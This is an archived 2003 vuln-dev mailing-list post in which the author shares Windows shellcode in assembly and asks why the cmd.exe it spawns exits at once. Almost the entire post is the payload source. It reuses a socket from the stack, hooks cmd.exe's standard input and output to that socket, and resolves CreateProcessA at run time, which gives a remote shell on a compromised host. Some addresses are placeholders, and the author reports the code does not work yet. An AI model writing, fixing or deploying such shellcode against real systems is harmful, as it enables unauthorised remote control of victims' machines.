Re: Windows reverse Shell

From: Berend-Jan Wever (skylined@edup.tudelft.nl)
Date: 02/05/03

  • Next message: Ali Saifullah Khan: "Re: Windows reverse Shell"
    Date: 5 Feb 2003 00:54:44 -0000
    From: Berend-Jan Wever <skylined@edup.tudelft.nl>
    To: vuln-dev@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) In-Reply-To: <00ef01c2cc6c$7fb7a030$a7db5cdb@sk4n>

    I wrote a little piece of shellcode that should spawn a shell using a
    socket in %ebp, which will execute cmd.exe succesfully. The problem is
    that cmd.exe dies right away. Has anybody got an idear why ? The source
    (asm for linux) is included.

    Kind regards,

    Berend-Jan Wever

        Start:
        MakeStringAndNegEbx:
          mov $',', %al
          xor %ecx, %ecx
          dec %ecx
          repne scasb # search for ','
          sub %al, -1(%edi)
          neg %ebx
          ret
        
        GetLibraryAndProcAddress: # {
          push %edi # > libName
          mov $-0xXXXXXX, %ebx #
          call MakeStringAndNegEbx # put 0 after libName
          call *(%ebx) # < LoadLibraryA(libName);

          push %edi # > procName
          push %eax # > libHandle
          mov $-0xXXXXXX, %ebx #
          call MakeStringAndNegEbx # put 0 after ProcName
          call *(%ebx) # << GetProcAddress(libHandle, procName);
          ret
        # }

        main1:
          # %ebp = socket
          pop %edi # < %edi = &strings
          
          # create a struct StartupInfo on the stack.
          xor %eax, %eax
          push %ebp # HANDLE hStdError = socket
          push %ebp # HANDLE hStdOutput = socket
          push %ebp # HANDLE hStdInPut = socket
          push %eax # LPBYTE lpReserved2 = NULL
          inc %eax # WORD cbReserved2 = 0;
          push %eax # WORD wShowWindow = 1;
          mov %al, %ah # 0x101
          push %eax # DWORD dwFlags = STARTF_USESHOWWINDOW |
          xor %eax, %eax # STARTF_USESTDHANDLES
          push %eax # DWORD dwFillAttribute = 0
          push %eax # DWORD dwYCountChars = 0
          push %eax # DWORD dwXCountChars = 0
          push %eax # DWORD dwYSize = 0
          push %eax # DWORD dwXSize = 0
          push %eax # DWORD dwY = 0
          push %eax # DWORD dwX = 0
          push %eax # LPTSTR lpTitle = NULL (program name)
          push %eax # LPTSTR lpDesktop = NULL (inherit)
          push %eax # LPTSTR lpReserved = NULL
          mov $0x44, %al
          push %eax # DWORD cb = 0x44 (length);
          mov %esp, %esi

          # create a struct ProcessInformation on the stack.
          xor %eax, %eax
          push %eax # HANDLE hProcess;
          push %eax # HANDLE hThread;
          push %eax # DWORD dwProcessId;
          push %eax # DWORD dwThreadId;

          # create a process with STD I/O handles hooked to socket.
          push %esp # > lpProcessInformation -> stack
          push %esi # > lpStartupInfo -> stack
          push %eax # > lpCurrentDirecty: NULL
          push %eax # > lpEnvironment: NULL
          push %eax # > dwCreationFlags: 0
          inc %eax
          push %eax # > bInheritHandles: 1 (true)
          dec %eax
          push %eax # > lpThreadAttributes: NULL
          push %eax # > lpProcessAttributes: NULL
          push %edi # > lpCommandLine: &('cmd.exe')
          push %eax # > lpApplicationName: NULL
          call MakeStringAndNegEbx # put 0 after commandline
          call GetLibraryAndProcAddress # LoadLibrary and GetProcAddress
          call *%eax # <<<<<<<<<< CreateProcess(...);
          
        InfinitLoop:
          jmp InfinitLoop # wait forever.

        EntryPoint:
          lea 0xXX(%esp), %eax # socket is on the stack at XX
          mov (%eax), %ebp # socket
          call main1
        End:

    The code is followed by this string:
        "cmd.exe,kernel32.dll,CreateProcessA,"